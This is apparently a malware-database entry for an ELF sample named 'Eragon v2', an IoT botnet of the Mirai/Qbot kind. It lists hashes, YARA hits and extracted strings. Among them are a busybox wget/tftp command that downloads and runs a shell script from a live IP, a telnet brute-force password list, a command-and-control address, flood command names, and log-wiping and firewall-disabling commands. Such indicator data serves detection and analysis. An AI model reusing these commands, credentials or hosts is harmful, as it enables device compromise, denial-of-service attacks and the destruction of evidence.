Sample details: bdaeb7396745e74f192125a8c95d5fd7 --

Hashes
MD5: bdaeb7396745e74f192125a8c95d5fd7
SHA1: 52acf023cd6f898d64ece099e77ca2a329ac71e6
SHA256: 523e748ac30d9e3eeba0c49eaea5fa03aa17a7f01d34b0f74a7671262447a330
SSDEEP: 1536:2Swafh5cfDj5lLWybWGKt/QFPYv/KDU7OclxmEequN4cGb1Mh7yMLN2UcYV:o85cbj5BWfjt41sCDUrbmDD7GbSh7yMj
Details
File Type: ELF
Added: 2019-06-19 22:55:28
Yara Hits
YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 |
Source
http://209.141.40.185/flix
Strings
		PTRhd]
~	<mtN
xAPPSh
D$ [Xj
D$, D$
t@;D$xu
wcQWUR
|$'ftt
T$8XZj
G$;G wn
9D$xu,
t$4C;\$h}
t>QQh9
<rt><w
E4tmPhd
yQGQVhT
|<+0u&
YRRj.W
x86_32
/usr/bin/python
SERVER
DEVICE
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0
SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1
209.141.40.185:794
cd /tmp/; /bin/busybox wget http://80.211.79.50/bins.sh; chmod +x bins.sh; sh bins.sh;  tftp -r tftp1.sh -g 80.211.79.50; chmod +x tftp1.sh; sh tftp1.sh; rm -rf *
default
/dev/netslink/
/var/run/
/dev/shm/
/boot/
sername
assword
nvalid
ncorrect
oodbye
busybox
mipsel
jackmymips
jackmymips64
jackmymipsel
jackmysh2eb
jackmysh2elf
jackmysh4
jackmyx86
jackmyarmv5
jackmyarmv4tl
jackmyarmv4
jackmyarmv6
jackmyi686
jackmypowerpc
jackmypowerpc440fp
jackmyi586
jackmym68k
jackmysparc
hackmymips
hackmymipsel
hackmysh4
hackmyx86
hackmyarmv6
hackmyi686
hackmypowerpc
hackmyi586
hackmym68k
hackmysparc
armarmv5larmv6lb1
busyboxterrorist
DFhxdhdf
dvrHelper
FDFDHFC
FTUdftui
GHfjfgvj
jackmyarmv5l
jackmyarmv6l
jackmyarv6
JIPJIPJj
JIPJuipjh
kmyx86_64
lolmipsel
RYrydry
telarmv6l
telmips
telmipsel
telx86
TwoFacearmv61
TwoFacei586
TwoFacei686
TwoFacem86k
TwoFacemips
TwoFacemipsel
TwoFacepowerpc
TwoFacesh4
TwoFacesparc
TwoFacex86_64
UYyuyioy
x86_64
XDzdfxzf
20botmips
botmipsel
botsh4
botx86_64
botarmv6l
boti686
botpowerpc
boti586
botm68k
botsparc
botarmv4l
botarmv5l
botpowerpc440fpbotmipsfinal
botmipselfinal
botsh4final
botx86_64final
botarmv6lfinal
boti686final
botpowerpcfinal
boti586final
botm68kfinal
botsparcfinal
botarmv4lfinal
botarmv5lfinal
botpowerpc440fpfinal
mirai.x86
mirai.mips
mirai.mpsl
mirai.arm
mirai.arm5n
mirai.arm7
mirai.ppc
mirai.spc
mirai.m68k
mirai.sh4
miraint.x86
miraint.mips
miraint.mpsl
miraint.arm
miraint.arm5n
miraint.arm7
miraint.ppc
miraint.spc
miraint.m68k
miraint.sh4bot.x86
bot.mips
bot.mpsl
bot.arm
bot.arm5n
bot.arm7
bot.ppc
bot.spc
bot.m68k
bot.sh4
botnt.x86
botnt.mips
botnt.mpsl
botnt.arm
botnt.arm5n
botnt.arm7
botnt.ppc
botnt.spc
botnt.m68k
botnt.sh4
kill -9 %s
killall -9 sshd;pkill -9 sshd
ps -C sshd -o pid=
kill -9 %s
yvr4rxgp60fgvmeerwaxqbum8aea9z4
(null)
%d.%d.%d.%d
Eragon Bruted -> %s [ %s:%s ]
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
VSzNC0CJti3ouku
yhJyMAqx7DZa0kg
1Cp9MEDMN6B5L1K
niggaNiggerXds
muchpower
9XdSldsd
Xddsslslsls
eNxERkyrfR
qHjTXcMbzH
chickennuggets
ilovecocaine
666666
88888888
0nnf0l20im
uq7ajzgm0a
ParasJhaIsADumbFag
stdudpbasedflood
bitcoin1
password
eRaGonBotNet
suckmyFOUND
guardiacivil
2xoJTsbXunuj
QiMH8CGJyOj9
abcd1234
GLEQWXHAJPWM
ABCDEFGHI
Eragon
qbotbotnet
lizardsquad
aNrjBnTRi
1QD8ypG86
IVkLWYjLe
kadenthegod
satoriskidsnet
TELNET
HTTPHEX
KILLATTK
8.8.8.8
/proc/net/route
	00000000	
BIG_ENDIAN
LITTLE_ENDIAN
BIG_ENDIAN_W
LITTLE_ENDIAN_W
UNKNOWN
/etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4
rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
rm -rf /var/log/wtmp
rm -rf /tmp/*
rm -rf /bin/netstat
iptables -F
pkill -9 busybox
pkill -9 perl
pkill -9 python
service iptables stop
/sbin/iptables -F; /sbin/iptables -X
service firewalld stop
rm -rf ~/.bash_history
history -c
Eragon v2
[ ERAGON ] 
[96m[%s] 
[97mConnected -> %s -> %s
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
/bin/sh
/dev/null
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.rodata
.eh_frame
.ctors
.dtors
.got.plt
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
Eragon2.0.c
i.4391
printchar
prints
printi
ipState.5304
C.308.7515
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
access.c
chdir.c
close.c
fork.c
getpid.c
getppid.c
ioctl.c
kill.c
open.c
prctl.c
read.c
select.c
time.c
unlink.c
waitpid.c
write.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
clock.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.4160
_fixed_buffers
_wcommit.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4370
prefix.4371
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4372
qual_chars.4377
spec_chars.4373
spec_ranges.4374
spec_or_mask.4375
spec_and_mask.4376
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcpy.c
strlen.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1330
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
next_start.1278
isatty.c
tcgetattr.c
ntohl.c
inet_ntoa.c
buf.2827
inet_makeaddr.c
gethostbyname.c
buf.5162
h.5161
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sysconf.c
usleep.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3001
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/vfork.S
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
execve.c
getdtablesize.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getrlimit.c
getuid.c
munmap.c
nanosleep.c
sbrk.c
sigprocmask.c
times.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
memchr.c
memmove.c
strncpy.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
dl-support.c
__syscall_error.c
poll.c
fclose.c
fopen.c
fseeko.c
fseeko64.c
_adjust_pos.c
_fopen.c
_cs_funcs.c
fgets.c
fflush_unlocked.c
fgets_unlocked.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3285
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
fgetc_unlocked.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
port_closer
UpdateNameSrvs
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
botnetTScan
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
sysconf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
memmove
sendTCP
__bsd_signal
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
_uintmaxtostr
__libc_fcntl
_h_errno
getc_unlocked
__ctype_b
__GI_random_r
usernames
getegid
read_until_response
__GI_sbrk
__GI___uClibc_init
usleep
execve
getpagesize
getpid
__GI_lseek64
setstate_r
getHost
output
botnetPrint
__libc_getpid
__xpg_strerror_r
fcntl64
bot_killer
memcpy
makeRandomStr
__GI_fputs_unlocked
__GI_fgets
rand_init
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
__GI_fgets_unlocked
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
isatty
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
random_r
__dso_handle
clock_getres
gethostbyname_r
tcpcsum
reset_telstate
socket
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
BusyBoxPayload
__GI_open
__GI_strchr
__searchdomain
__GI_tcgetattr
__environ
wcsnrtombs
makeIPPacket
__GI_inet_ntoa
__fgetc_unlocked
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
__GI_inet_ntoa_r
__GI_setstate_r
strtol
__libc_lseek64
strnlen
rawmemchr
ServerInfo
__GI_mempcpy
__malloc_state
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
__register_frame_info_bases
__GI_exit
__app_fini
__exit_cleanup
RemoveTempDirs
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
environ
__GI_close
getBuild
__resolv_lock
fputs_unlocked
__pthread_mutex_trylock
Bot_Killer_Binarys
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
__GI_fseek
util_strlen
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
__GI_times
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
tmpdirs
__stdin
__GI_isatty
strcasestr
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
rand_str
signal
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
strncpy
unlink
strcasecmp
sendto
__C_ctype_toupper
__GI___C_ctype_b
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
__GI___C_ctype_tolower
__GI_getrlimit
__GI_strcpy
__GI_inet_ntop
strtok
getEndianness
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
rand_next
__stdio_rfill
strncat
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
util_memcpy
_pthread_cleanup_push_defer
processCmd
__sigismember
__bss_start
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
__glibc_strerror_r
ourPublicIP
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
botnetPid
initstate
fclose
__syscall_rt_sigaction
sendUDP
inet_ntoa
getppid
tcgetattr
__C_ctype_tolower_data
__libc_system
__GI_abort
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
strcmp
advances2
__nameserver
data_start
__GI_sysconf
__h_errno_location
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
advance_state
__GI_chdir
__vfork
__GI_mmap
contains_success
sprintf
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__decode_answer
__GI_signal
stderr
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__libc_fork
__atexit_lock
SendHTTPHex
rand_cmwc
getBuildz
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
fflush_unlocked
__stdio_wcommit
contains_string
__GI___fgetc_unlocked
__GI_unlink
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
contains_response
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
util_strcpy
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
__GI___libc_open
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
__C_ctype_toupper_data
_dl_aux_init
_errno
successes
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
botnetServer
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
readUntil
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
rand_alphastr
__libc_connect
passwords
__GI_strlen
SendHTTP
strpbrk
KadenCommStock
_load_inttype
useragents
sigprocmask
getsockname